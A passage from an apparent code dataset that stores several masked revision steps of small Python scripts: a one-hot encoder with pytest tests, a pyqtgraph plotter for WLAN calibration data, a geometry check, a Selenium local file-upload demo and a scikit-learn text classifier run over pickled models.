"step-2": "<mask token>\n\n\ndef test_str_fit_transformr():\n assert fit_transform(['Moscow', 'New York', 'Moscow', 'London']) == [(\n 'Moscow', [0, 0, 1]), ('New York', [0, 1, 0]), ('Moscow', [0, 0, 1]\n ), ('London', [1, 0, 0])]\n\n\ndef test_int_fit_str_transformr():\n assert fit_transform([1, 2, 1, 3]) == [(1, [0, 0, 1]), (2, [0, 1, 0]),\n (1, [0, 0, 1]), (3, [1, 0, 0])]\n\n\ndef test_error_type_fit_transformr():\n with pytest.raises(TypeError):\n fit_transform(1)\n\n\n@pytest.fixture()\ndef randomize():\n from random import randint\n return [randint(0, 9) for _ in range(randint(0, 10))]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef fit_transform(*args: str) ->List[Tuple[str, List[int]]]:\n if len(args) == 0:\n raise TypeError('expected at least 1 arguments, got 0')\n categories = args if isinstance(args[0], str) else list(args[0])\n uniq_categories = set(categories)\n bin_format = f'{{0:0{len(uniq_categories)}b}}'\n seen_categories = dict()\n transformed_rows = []\n for cat in categories:\n bin_view_cat = (int(b) for b in bin_format.format(1 << len(\n seen_categories)))\n seen_categories.setdefault(cat, list(bin_view_cat))\n transformed_rows.append((cat, seen_categories[cat]))\n return transformed_rows\n\n\ndef test_str_fit_transformr():\n assert fit_transform(['Moscow', 'New York', 'Moscow', 'London']) == [(\n 'Moscow', [0, 0, 1]), ('New York', [0, 1, 0]), ('Moscow', [0, 0, 1]\n ), ('London', [1, 0, 0])]\n\n\ndef test_int_fit_str_transformr():\n assert fit_transform([1, 2, 1, 3]) == [(1, [0, 0, 1]), (2, [0, 1, 0]),\n (1, [0, 0, 1]), (3, [1, 0, 0])]\n\n\ndef test_error_type_fit_transformr():\n with pytest.raises(TypeError):\n fit_transform(1)\n\n\n@pytest.fixture()\ndef randomize():\n from random import randint\n return [randint(0, 9) for _ in range(randint(0, 10))]\n\n\ndef test_intv2_fit_transformr(randomize):\n print(randomize)\n result = fit_transform(randomize)\n assert len(result) == len(randomize)\n",
"step-4": "from typing import List, Tuple\nimport pytest\n\n\ndef fit_transform(*args: str) ->List[Tuple[str, List[int]]]:\n if len(args) == 0:\n raise TypeError('expected at least 1 arguments, got 0')\n categories = args if isinstance(args[0], str) else list(args[0])\n uniq_categories = set(categories)\n bin_format = f'{{0:0{len(uniq_categories)}b}}'\n seen_categories = dict()\n transformed_rows = []\n for cat in categories:\n bin_view_cat = (int(b) for b in bin_format.format(1 << len(\n seen_categories)))\n seen_categories.setdefault(cat, list(bin_view_cat))\n transformed_rows.append((cat, seen_categories[cat]))\n return transformed_rows\n\n\ndef test_str_fit_transformr():\n assert fit_transform(['Moscow', 'New York', 'Moscow', 'London']) == [(\n 'Moscow', [0, 0, 1]), ('New York', [0, 1, 0]), ('Moscow', [0, 0, 1]\n ), ('London', [1, 0, 0])]\n\n\ndef test_int_fit_str_transformr():\n assert fit_transform([1, 2, 1, 3]) == [(1, [0, 0, 1]), (2, [0, 1, 0]),\n (1, [0, 0, 1]), (3, [1, 0, 0])]\n\n\ndef test_error_type_fit_transformr():\n with pytest.raises(TypeError):\n fit_transform(1)\n\n\n@pytest.fixture()\ndef randomize():\n from random import randint\n return [randint(0, 9) for _ in range(randint(0, 10))]\n\n\ndef test_intv2_fit_transformr(randomize):\n print(randomize)\n result = fit_transform(randomize)\n assert len(result) == len(randomize)\n",
"step-5": "from typing import List, Tuple\r\nimport pytest\r\n\r\n\r\ndef fit_transform(*args: str) -> List[Tuple[str, List[int]]]:\r\n if len(args) == 0:\r\n raise TypeError('expected at least 1 arguments, got 0')\r\n\r\n categories = args if isinstance(args[0], str) else list(args[0])\r\n uniq_categories = set(categories)\r\n bin_format = f'{{0:0{len(uniq_categories)}b}}'\r\n\r\n seen_categories = dict()\r\n transformed_rows = []\r\n\r\n for cat in categories:\r\n bin_view_cat = (int(b) for b in bin_format.format(1 << len(seen_categories)))\r\n seen_categories.setdefault(cat, list(bin_view_cat))\r\n transformed_rows.append((cat, seen_categories[cat]))\r\n\r\n return transformed_rows\r\n\r\n\r\ndef test_str_fit_transformr():\r\n assert fit_transform(['Moscow', 'New York', 'Moscow', 'London']) == [\r\n ('Moscow', [0, 0, 1]),\r\n ('New York', [0, 1, 0]),\r\n ('Moscow', [0, 0, 1]),\r\n ('London', [1, 0, 0]),\r\n ]\r\n\r\n\r\ndef test_int_fit_str_transformr():\r\n assert fit_transform([1, 2, 1, 3]) == [\r\n (1, [0, 0, 1]),\r\n (2, [0, 1, 0]),\r\n (1, [0, 0, 1]),\r\n (3, [1, 0, 0]),\r\n ]\r\n\r\n\r\n# чтобы проверить, что код вызывает исключение, нужно использовать менеджер контекста pytest.raises\r\ndef test_error_type_fit_transformr():\r\n with pytest.raises(TypeError):\r\n fit_transform(1)\r\n\r\n\r\n@pytest.fixture()\r\ndef randomize():\r\n from random import randint\r\n return [randint(0, 9) for _ in range(randint(0, 10))]\r\n\r\n\r\ndef test_intv2_fit_transformr(randomize):\r\n print(randomize)\r\n result = fit_transform(randomize)\r\n assert (len(result) == len(randomize))\r\n",
"step-ids": [
3,
4,
6,
7,
8
]
}
|
[
3,
4,
6,
7,
8
] |
#!/usr/bin/python
#===============================================================================
#
# Board Data File Analyzer
#
# Copyright (c) 2017 by QUALCOMM Atheros, Incorporated.
# All Rights Reserved
# QUALCOMM Atheros Confidential and Proprietary
#
# Notifications and licenses are retained for attribution purposes only
#===============================================================================
#--------------
import pyqtgraph as pg
from pyqtgraph.Qt import QtGui
from array import array
import numpy as np
Description = """
[Description]:
Read WLAN board data file and generate graph per chain.
1 2 3 4
fullmeas_pwr_0_G_0_0
fullmeas_pwr_0_A_0_0
1. Index/Step: a iteration takes 10 steps
2. Band: 'G' is 2.4G and 'A' is 5G.
3. Channel: 14 channels for 2.4G and 32 channels for 5G.
4. Chain: Either chain0 or chain1.
[Input]:
BIN/wlan_proc/wlan/halphy_tools/host/bdfUtil/qca61x0/bdf
[Usage]:
BDFAnalyzer.py input.txt
"""
fullpdadc_val_list = [] # y-axis
fullpwr_val_list = [] # x-axis
fullpwr_tag_list = []
win = pg.GraphicsWindow(title="Chain Analyzer: chain 0 (RED) chain 1 (GREEN)")
win.resize(1000,600)
def backup_calibration(fin):
for index in range(len(fullpwr_tag_list)):
fin.write(fullpwr_tag_list[index])
fin.write(" ")
fin.write(fullpwr_val_list[index])
fin.write(",")
fin.write(fullpdadc_val_list[index])
fin.write("\n")
def plot_render(band, channel):
index_lower = 0
index_upper = 0
X = []
Y = []
if band == "G": # 2.4G
index_lower = channel * 20
index_upper = (channel+1) * 20
elif band == "A": # 5G
index_lower = 280 + channel * 20
index_upper = 280 + (channel+1) * 20
else:
print "Plot render error\n"
for i in range(index_lower, index_upper):
X.append(int(fullpwr_val_list[i], 10))
Y.append(int(fullpdadc_val_list[i], 10))
title_description = "Channel " + str(channel)
pp = win.addPlot(title = title_description)
pp.plot(X[0:10],Y[0:10], title="Chain 0", pen=(255,0,0)) # chain 0 as red line
pp.plot(X[10:20],Y[10:20], title="Chain 1", pen=(0,255,0)) # chain 1 as green line
pp.showGrid(x=True, y=True)
def main():
global fullpwr_tag_list, fullpwr_val_list, fullpdadc_val_list
clpc = open("files/calibration.txt","w")
bdf = open("files/bdwlan30.txt",'r')
# read data
for line in bdf:
if "fullpdadc" in line:
tmp = line.split()
fullpdadc_val_list.append(tmp[1])
if "fullmeas_pwr" in line:
tmp = line.split()
fullpwr_tag_list.append(tmp[0])
fullpwr_val_list.append(tmp[1])
# write calibration backup file
backup_calibration(clpc)
bdf.close()
clpc.close()
# draw plot
plot_render('A', 7)
plot_render('A', 8)
win.nextRow()
plot_render('A', 9)
plot_render('A', 10)
if __name__ == '__main__':
import sys
if sys.flags.interactive != 1 or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.exec_()
main()
|
normal
|
{
"blob_id": "5c12ff4f88af991fa275cd08adf3678ee4a678f3",
"index": 8532,
"step-1": "#!/usr/bin/python\n#===============================================================================\n#\n# Board Data File Analyzer\n#\n# Copyright (c) 2017 by QUALCOMM Atheros, Incorporated.\n# All Rights Reserved\n# QUALCOMM Atheros Confidential and Proprietary\n#\n# Notifications and licenses are retained for attribution purposes only\n#===============================================================================\n\n#--------------\nimport pyqtgraph as pg\nfrom pyqtgraph.Qt import QtGui\nfrom array import array\nimport numpy as np\n\nDescription = \"\"\"\n[Description]:\nRead WLAN board data file and generate graph per chain.\n 1 2 3 4\nfullmeas_pwr_0_G_0_0\nfullmeas_pwr_0_A_0_0\n\n1. Index/Step: a iteration takes 10 steps\n2. Band: 'G' is 2.4G and 'A' is 5G.\n3. Channel: 14 channels for 2.4G and 32 channels for 5G.\n4. Chain: Either chain0 or chain1.\n\n[Input]:\nBIN/wlan_proc/wlan/halphy_tools/host/bdfUtil/qca61x0/bdf\n[Usage]:\nBDFAnalyzer.py input.txt\n\"\"\"\n\nfullpdadc_val_list = [] # y-axis\nfullpwr_val_list = [] # x-axis\nfullpwr_tag_list = [] \n\nwin = pg.GraphicsWindow(title=\"Chain Analyzer: chain 0 (RED) chain 1 (GREEN)\")\nwin.resize(1000,600)\ndef backup_calibration(fin):\n\tfor index in range(len(fullpwr_tag_list)):\n\t\tfin.write(fullpwr_tag_list[index])\n\t\tfin.write(\" \")\n\t\tfin.write(fullpwr_val_list[index])\n\t\tfin.write(\",\")\n\t\tfin.write(fullpdadc_val_list[index])\n\t\tfin.write(\"\\n\")\n\ndef plot_render(band, channel):\n\tindex_lower = 0\n\tindex_upper = 0\n\tX = []\n\tY = []\n\tif band == \"G\": # 2.4G\n\t\tindex_lower = channel * 20\n\t\tindex_upper = (channel+1) * 20 \n\telif band == \"A\": # 5G\n\t\tindex_lower = 280 + channel * 20\n\t\tindex_upper = 280 + (channel+1) * 20 \n\telse:\n\t\tprint \"Plot render error\\n\"\n\t\n\tfor i in range(index_lower, index_upper):\n\t\tX.append(int(fullpwr_val_list[i], 10))\n\t\tY.append(int(fullpdadc_val_list[i], 10))\n\n\ttitle_description = \"Channel \" + str(channel)\n\tpp = win.addPlot(title = title_description)\n\tpp.plot(X[0:10],Y[0:10], title=\"Chain 0\", pen=(255,0,0)) # chain 0 as red line\n\tpp.plot(X[10:20],Y[10:20], title=\"Chain 1\", pen=(0,255,0)) # chain 1 as green line\n\tpp.showGrid(x=True, y=True)\n\t\t\n\ndef main():\n\tglobal fullpwr_tag_list, fullpwr_val_list, fullpdadc_val_list\n\tclpc = open(\"files/calibration.txt\",\"w\")\n\tbdf = open(\"files/bdwlan30.txt\",'r')\n\t# read data\n\tfor line in bdf:\n\t\tif \"fullpdadc\" in line:\n\t\t\ttmp = line.split()\n\t\t\tfullpdadc_val_list.append(tmp[1])\n\t\tif \"fullmeas_pwr\" in line:\n\t\t\ttmp = line.split()\n\t\t\tfullpwr_tag_list.append(tmp[0])\n\t\t\tfullpwr_val_list.append(tmp[1])\n\n\t# write calibration backup file\n\tbackup_calibration(clpc)\n\tbdf.close()\n\tclpc.close()\n\t# draw plot\n\tplot_render('A', 7)\n\tplot_render('A', 8)\n\twin.nextRow()\n\tplot_render('A', 9)\n\tplot_render('A', 10)\n\tif __name__ == '__main__':\n\t\timport sys\n\t\tif sys.flags.interactive != 1 or not hasattr(QtCore, 'PYQT_VERSION'):\n\t\t\tQtGui.QApplication.exec_()\n\nmain()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if k2 >= k:
print(' Yes, the scene can be set.')
else:
print(" Sorry, but the scene can't be set.")
<|reserved_special_token_1|>
<|reserved_special_token_0|>
s = int(input('Input your area of square (S): '))
r = int(input('Input your radius of scene (R): '))
k = int(input('Input your width of passage (K): '))
k2 = sqrt(s) / 2 - r
if k2 >= k:
print(' Yes, the scene can be set.')
else:
print(" Sorry, but the scene can't be set.")
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from math import sqrt
s = int(input('Input your area of square (S): '))
r = int(input('Input your radius of scene (R): '))
k = int(input('Input your width of passage (K): '))
k2 = sqrt(s) / 2 - r
if k2 >= k:
print(' Yes, the scene can be set.')
else:
print(" Sorry, but the scene can't be set.")
<|reserved_special_token_1|>
'''Чи можна в квадратному залі площею S помістити круглу сцену радіусом R так,
щоб від стіни до сцени був прохід не менше K?'''
from math import sqrt
s = int(input('Input your area of square (S): '))
r = int(input('Input your radius of scene (R): '))
k = int(input('Input your width of passage (K): '))
k2 = sqrt(s) / 2 - r
if k2 >= k:
print(" Yes, the scene can be set.")
else:
print(" Sorry, but the scene can't be set.")
|
flexible
|
{
"blob_id": "31a2fa5b2febc2ef80b57e45c2ebb662b886c4b7",
"index": 6043,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif k2 >= k:\n print(' Yes, the scene can be set.')\nelse:\n print(\" Sorry, but the scene can't be set.\")\n",
"step-3": "<mask token>\ns = int(input('Input your area of square (S): '))\nr = int(input('Input your radius of scene (R): '))\nk = int(input('Input your width of passage (K): '))\nk2 = sqrt(s) / 2 - r\nif k2 >= k:\n print(' Yes, the scene can be set.')\nelse:\n print(\" Sorry, but the scene can't be set.\")\n",
"step-4": "<mask token>\nfrom math import sqrt\ns = int(input('Input your area of square (S): '))\nr = int(input('Input your radius of scene (R): '))\nk = int(input('Input your width of passage (K): '))\nk2 = sqrt(s) / 2 - r\nif k2 >= k:\n print(' Yes, the scene can be set.')\nelse:\n print(\" Sorry, but the scene can't be set.\")\n",
"step-5": "'''Чи можна в квадратному залі площею S помістити круглу сцену радіусом R так,\r\nщоб від стіни до сцени був прохід не менше K?'''\r\nfrom math import sqrt\r\n\r\ns = int(input('Input your area of square (S): '))\r\nr = int(input('Input your radius of scene (R): '))\r\nk = int(input('Input your width of passage (K): '))\r\nk2 = sqrt(s) / 2 - r\r\nif k2 >= k:\r\n print(\" Yes, the scene can be set.\")\r\nelse:\r\n print(\" Sorry, but the scene can't be set.\")\r\n\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
driver.get(upload_page)
driver.find_element_by_id('inputfile').send_keys(file_path + '\\test.txt')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
file_path = os.path.abspath('./files//')
driver = webdriver.Firefox()
upload_page = 'file:///' + file_path + '/upfile.html'
driver.get(upload_page)
driver.find_element_by_id('inputfile').send_keys(file_path + '\\test.txt')
<|reserved_special_token_1|>
import os
from selenium import webdriver
file_path = os.path.abspath('./files//')
driver = webdriver.Firefox()
upload_page = 'file:///' + file_path + '/upfile.html'
driver.get(upload_page)
driver.find_element_by_id('inputfile').send_keys(file_path + '\\test.txt')
<|reserved_special_token_1|>
# 上传文件
import os
from selenium import webdriver
# 获取当前路径的 “files” 文件夹
file_path = os.path.abspath("./files//")
# 浏览器打开文件夹的 upfile.html 文件
driver = webdriver.Firefox()
upload_page = "file:///" + file_path + "/upfile.html"
driver.get(upload_page)
# 定位上传按钮,添加本地文件
driver.find_element_by_id("inputfile").send_keys(file_path + "\\test.txt")
|
flexible
|
{
"blob_id": "9e28fa1f221df13f9cc8e6b71586da961ebdc0e0",
"index": 4580,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ndriver.get(upload_page)\ndriver.find_element_by_id('inputfile').send_keys(file_path + '\\\\test.txt')\n",
"step-3": "<mask token>\nfile_path = os.path.abspath('./files//')\ndriver = webdriver.Firefox()\nupload_page = 'file:///' + file_path + '/upfile.html'\ndriver.get(upload_page)\ndriver.find_element_by_id('inputfile').send_keys(file_path + '\\\\test.txt')\n",
"step-4": "import os\nfrom selenium import webdriver\nfile_path = os.path.abspath('./files//')\ndriver = webdriver.Firefox()\nupload_page = 'file:///' + file_path + '/upfile.html'\ndriver.get(upload_page)\ndriver.find_element_by_id('inputfile').send_keys(file_path + '\\\\test.txt')\n",
"step-5": "# 上传文件\n\nimport os\nfrom selenium import webdriver\n\n# 获取当前路径的 “files” 文件夹\nfile_path = os.path.abspath(\"./files//\")\n\n# 浏览器打开文件夹的 upfile.html 文件\ndriver = webdriver.Firefox()\nupload_page = \"file:///\" + file_path + \"/upfile.html\"\ndriver.get(upload_page)\n\n# 定位上传按钮,添加本地文件\ndriver.find_element_by_id(\"inputfile\").send_keys(file_path + \"\\\\test.txt\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open(forbidpath, 'rb') as f:
for line in f:
word = line.strip()
forbidkword[word] = 0
<|reserved_special_token_0|>
with open(inputpath, 'rb') as f:
for line in f:
splits = line.strip().split('\t')
tag = splits[0]
if tag.find(label) > -1:
print(tag)
train = []
seg = jieba_cut.cut(splits[-1], cut_all=False)
seglist = []
for w in seg:
w = w.strip().encode('utf-8')
if w not in forbidkword:
if not re.match('\\d+$', w):
seglist.append(w)
train.append(' '.join(seglist))
X_test = vectorizer.transform(train)
X_test = chi2.transform(X_test)
pred = clf.predict(X_test)
print(pred)
lb = str(pred[0])
if lb == '1':
outfile.writelines(line.strip() + '\t')
outfile.writelines(lb + '\n')
outfile.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
outputfile = 'dzsptfidf'
X_train, y_train = cPickle.load(open(os.path.join(outputfile, 'train.data'),
'rb'))
X_test, y_test = cPickle.load(open(os.path.join(outputfile, 'test.data'), 'rb')
)
vectorizer = cPickle.load(open(os.path.join(outputfile, 'vectorizer.data'),
'rb'))
chi2 = cPickle.load(open(os.path.join(outputfile, 'ch2.data'), 'rb'))
clf = cPickle.load(open(os.path.join(outputfile, 'SGD_l2.model'), 'rb'))
inputpath = u'E:\\项目需求\\JDPower\\分类\\5月份\\financeoutput1_final_05.txt'
outputpath = u'E:\\项目需求\\JDPower\\分类\\5月份\\大宗商品.txt'
label = '大宗商品'
forbidkword = {}
forbidpath = u'..//keyword.txt'
with open(forbidpath, 'rb') as f:
for line in f:
word = line.strip()
forbidkword[word] = 0
outfile = open(outputpath, 'wb')
with open(inputpath, 'rb') as f:
for line in f:
splits = line.strip().split('\t')
tag = splits[0]
if tag.find(label) > -1:
print(tag)
train = []
seg = jieba_cut.cut(splits[-1], cut_all=False)
seglist = []
for w in seg:
w = w.strip().encode('utf-8')
if w not in forbidkword:
if not re.match('\\d+$', w):
seglist.append(w)
train.append(' '.join(seglist))
X_test = vectorizer.transform(train)
X_test = chi2.transform(X_test)
pred = clf.predict(X_test)
print(pred)
lb = str(pred[0])
if lb == '1':
outfile.writelines(line.strip() + '\t')
outfile.writelines(lb + '\n')
outfile.close()
<|reserved_special_token_1|>
from __future__ import print_function
import logging
import numpy as np
from optparse import OptionParser
import sys
from time import time
import matplotlib.pyplot as plt
import os
from sklearn.datasets import fetch_20newsgroups
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction.text import HashingVectorizer
from sklearn.feature_selection import SelectKBest, chi2
from sklearn.linear_model import RidgeClassifier
from sklearn.pipeline import Pipeline
from sklearn.svm import LinearSVC
from sklearn.linear_model import SGDClassifier
from sklearn.linear_model import Perceptron
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.naive_bayes import BernoulliNB, MultinomialNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neighbors import NearestCentroid
from sklearn.ensemble import RandomForestClassifier
from sklearn.utils.extmath import density
from sklearn import metrics
import jieba_cut
import random
import cPickle
import re
outputfile = 'dzsptfidf'
X_train, y_train = cPickle.load(open(os.path.join(outputfile, 'train.data'),
'rb'))
X_test, y_test = cPickle.load(open(os.path.join(outputfile, 'test.data'), 'rb')
)
vectorizer = cPickle.load(open(os.path.join(outputfile, 'vectorizer.data'),
'rb'))
chi2 = cPickle.load(open(os.path.join(outputfile, 'ch2.data'), 'rb'))
clf = cPickle.load(open(os.path.join(outputfile, 'SGD_l2.model'), 'rb'))
inputpath = u'E:\\项目需求\\JDPower\\分类\\5月份\\financeoutput1_final_05.txt'
outputpath = u'E:\\项目需求\\JDPower\\分类\\5月份\\大宗商品.txt'
label = '大宗商品'
forbidkword = {}
forbidpath = u'..//keyword.txt'
with open(forbidpath, 'rb') as f:
for line in f:
word = line.strip()
forbidkword[word] = 0
outfile = open(outputpath, 'wb')
with open(inputpath, 'rb') as f:
for line in f:
splits = line.strip().split('\t')
tag = splits[0]
if tag.find(label) > -1:
print(tag)
train = []
seg = jieba_cut.cut(splits[-1], cut_all=False)
seglist = []
for w in seg:
w = w.strip().encode('utf-8')
if w not in forbidkword:
if not re.match('\\d+$', w):
seglist.append(w)
train.append(' '.join(seglist))
X_test = vectorizer.transform(train)
X_test = chi2.transform(X_test)
pred = clf.predict(X_test)
print(pred)
lb = str(pred[0])
if lb == '1':
outfile.writelines(line.strip() + '\t')
outfile.writelines(lb + '\n')
outfile.close()
<|reserved_special_token_1|>
# -*- coding:UTF-8 -*-
from __future__ import print_function
import logging
import numpy as np
from optparse import OptionParser
import sys
from time import time
import matplotlib.pyplot as plt
import os
from sklearn.datasets import fetch_20newsgroups
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction.text import HashingVectorizer
from sklearn.feature_selection import SelectKBest, chi2
from sklearn.linear_model import RidgeClassifier
from sklearn.pipeline import Pipeline
from sklearn.svm import LinearSVC
from sklearn.linear_model import SGDClassifier
from sklearn.linear_model import Perceptron
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.naive_bayes import BernoulliNB, MultinomialNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neighbors import NearestCentroid
from sklearn.ensemble import RandomForestClassifier
from sklearn.utils.extmath import density
from sklearn import metrics
import jieba_cut
import random
import cPickle
import re
outputfile = "dzsptfidf"
X_train,y_train = cPickle.load(open(os.path.join(outputfile,"train.data"),"rb"))
X_test,y_test = cPickle.load(open(os.path.join(outputfile,"test.data"),"rb"))
vectorizer = cPickle.load(open(os.path.join(outputfile,"vectorizer.data"),"rb"))
chi2 = cPickle.load(open(os.path.join(outputfile,"ch2.data"),"rb"))
clf = cPickle.load(open(os.path.join(outputfile,"SGD_l2.model"),"rb"))
#inputpath =u"E:\\项目需求\\JDPower\\分类\\4月份\\financeoutput1_final.txt"
#outputpath =u"E:\\项目需求\\JDPower\\分类\\4月份\\大宗商品.txt"
inputpath =u"E:\\项目需求\\JDPower\\分类\\5月份\\financeoutput1_final_05.txt"
outputpath =u"E:\\项目需求\\JDPower\\分类\\5月份\\大宗商品.txt"
label = "大宗商品"
forbidkword = {}
# load
forbidpath = u"..//keyword.txt"
with open(forbidpath, "rb") as f:
for line in f:
word = line.strip()
forbidkword[word] = 0
outfile = open(outputpath,"wb")
with open(inputpath, "rb") as f:
for line in f:
splits = line.strip().split("\t")
tag = splits[0]
if tag.find(label) > -1 :
print(tag)
train = []
#print (splits[-1])
seg = jieba_cut.cut(splits[-1], cut_all=False)
#seglist = [i for i in seg]
seglist = []
for w in seg:
#print w
w = w.strip().encode("utf-8")
if w not in forbidkword:
if not re.match(r"\d+$", w):
seglist.append(w)
train.append(" ".join(seglist))
X_test = vectorizer.transform(train)
X_test = chi2.transform(X_test)
pred = clf.predict(X_test)
#print(" ".join(pred))
print (pred)
lb = str(pred[0])
#print(isinstance(lb, unicode))
#print( lb.decode("gbk").encode("utf-8"))
#outfile.writelines(lb+"\n")
if lb == '1' :
outfile.writelines(line.strip()+"\t")
outfile.writelines(lb+"\n")
#outfile.writelines(line.strip()+"\t"+lb.decode("utf-8").encode("utf-8")+"\n")
outfile.close()
|
flexible
|
{
"blob_id": "84a516e924252d897be7444e11acfecd66474090",
"index": 1177,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(forbidpath, 'rb') as f:\n for line in f:\n word = line.strip()\n forbidkword[word] = 0\n<mask token>\nwith open(inputpath, 'rb') as f:\n for line in f:\n splits = line.strip().split('\\t')\n tag = splits[0]\n if tag.find(label) > -1:\n print(tag)\n train = []\n seg = jieba_cut.cut(splits[-1], cut_all=False)\n seglist = []\n for w in seg:\n w = w.strip().encode('utf-8')\n if w not in forbidkword:\n if not re.match('\\\\d+$', w):\n seglist.append(w)\n train.append(' '.join(seglist))\n X_test = vectorizer.transform(train)\n X_test = chi2.transform(X_test)\n pred = clf.predict(X_test)\n print(pred)\n lb = str(pred[0])\n if lb == '1':\n outfile.writelines(line.strip() + '\\t')\n outfile.writelines(lb + '\\n')\noutfile.close()\n",
"step-3": "<mask token>\noutputfile = 'dzsptfidf'\nX_train, y_train = cPickle.load(open(os.path.join(outputfile, 'train.data'),\n 'rb'))\nX_test, y_test = cPickle.load(open(os.path.join(outputfile, 'test.data'), 'rb')\n )\nvectorizer = cPickle.load(open(os.path.join(outputfile, 'vectorizer.data'),\n 'rb'))\nchi2 = cPickle.load(open(os.path.join(outputfile, 'ch2.data'), 'rb'))\nclf = cPickle.load(open(os.path.join(outputfile, 'SGD_l2.model'), 'rb'))\ninputpath = u'E:\\\\项目需求\\\\JDPower\\\\分类\\\\5月份\\\\financeoutput1_final_05.txt'\noutputpath = u'E:\\\\项目需求\\\\JDPower\\\\分类\\\\5月份\\\\大宗商品.txt'\nlabel = '大宗商品'\nforbidkword = {}\nforbidpath = u'..//keyword.txt'\nwith open(forbidpath, 'rb') as f:\n for line in f:\n word = line.strip()\n forbidkword[word] = 0\noutfile = open(outputpath, 'wb')\nwith open(inputpath, 'rb') as f:\n for line in f:\n splits = line.strip().split('\\t')\n tag = splits[0]\n if tag.find(label) > -1:\n print(tag)\n train = []\n seg = jieba_cut.cut(splits[-1], cut_all=False)\n seglist = []\n for w in seg:\n w = w.strip().encode('utf-8')\n if w not in forbidkword:\n if not re.match('\\\\d+$', w):\n seglist.append(w)\n train.append(' '.join(seglist))\n X_test = vectorizer.transform(train)\n X_test = chi2.transform(X_test)\n pred = clf.predict(X_test)\n print(pred)\n lb = str(pred[0])\n if lb == '1':\n outfile.writelines(line.strip() + '\\t')\n outfile.writelines(lb + '\\n')\noutfile.close()\n",
"step-4": "from __future__ import print_function\nimport logging\nimport numpy as np\nfrom optparse import OptionParser\nimport sys\nfrom time import time\nimport matplotlib.pyplot as plt\nimport os\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.feature_extraction.text import HashingVectorizer\nfrom sklearn.feature_selection import SelectKBest, chi2\nfrom sklearn.linear_model import RidgeClassifier\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.svm import LinearSVC\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.linear_model import PassiveAggressiveClassifier\nfrom sklearn.naive_bayes import BernoulliNB, MultinomialNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neighbors import NearestCentroid\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.utils.extmath import density\nfrom sklearn import metrics\nimport jieba_cut\nimport random\nimport cPickle\nimport re\noutputfile = 'dzsptfidf'\nX_train, y_train = cPickle.load(open(os.path.join(outputfile, 'train.data'),\n 'rb'))\nX_test, y_test = cPickle.load(open(os.path.join(outputfile, 'test.data'), 'rb')\n )\nvectorizer = cPickle.load(open(os.path.join(outputfile, 'vectorizer.data'),\n 'rb'))\nchi2 = cPickle.load(open(os.path.join(outputfile, 'ch2.data'), 'rb'))\nclf = cPickle.load(open(os.path.join(outputfile, 'SGD_l2.model'), 'rb'))\ninputpath = u'E:\\\\项目需求\\\\JDPower\\\\分类\\\\5月份\\\\financeoutput1_final_05.txt'\noutputpath = u'E:\\\\项目需求\\\\JDPower\\\\分类\\\\5月份\\\\大宗商品.txt'\nlabel = '大宗商品'\nforbidkword = {}\nforbidpath = u'..//keyword.txt'\nwith open(forbidpath, 'rb') as f:\n for line in f:\n word = line.strip()\n forbidkword[word] = 0\noutfile = open(outputpath, 'wb')\nwith open(inputpath, 'rb') as f:\n for line in f:\n splits = line.strip().split('\\t')\n tag = splits[0]\n if tag.find(label) > -1:\n print(tag)\n train = []\n seg = jieba_cut.cut(splits[-1], cut_all=False)\n seglist = []\n for w in seg:\n w = w.strip().encode('utf-8')\n if w not in forbidkword:\n if not re.match('\\\\d+$', w):\n seglist.append(w)\n train.append(' '.join(seglist))\n X_test = vectorizer.transform(train)\n X_test = chi2.transform(X_test)\n pred = clf.predict(X_test)\n print(pred)\n lb = str(pred[0])\n if lb == '1':\n outfile.writelines(line.strip() + '\\t')\n outfile.writelines(lb + '\\n')\noutfile.close()\n",
"step-5": "# -*- coding:UTF-8 -*-\nfrom __future__ import print_function\nimport logging\nimport numpy as np\nfrom optparse import OptionParser\nimport sys\nfrom time import time\nimport matplotlib.pyplot as plt\nimport os\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.feature_extraction.text import HashingVectorizer\nfrom sklearn.feature_selection import SelectKBest, chi2\nfrom sklearn.linear_model import RidgeClassifier\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.svm import LinearSVC\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.linear_model import PassiveAggressiveClassifier\nfrom sklearn.naive_bayes import BernoulliNB, MultinomialNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neighbors import NearestCentroid\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.utils.extmath import density\nfrom sklearn import metrics\nimport jieba_cut\nimport random\nimport cPickle\nimport re\noutputfile = \"dzsptfidf\"\nX_train,y_train = cPickle.load(open(os.path.join(outputfile,\"train.data\"),\"rb\"))\nX_test,y_test = 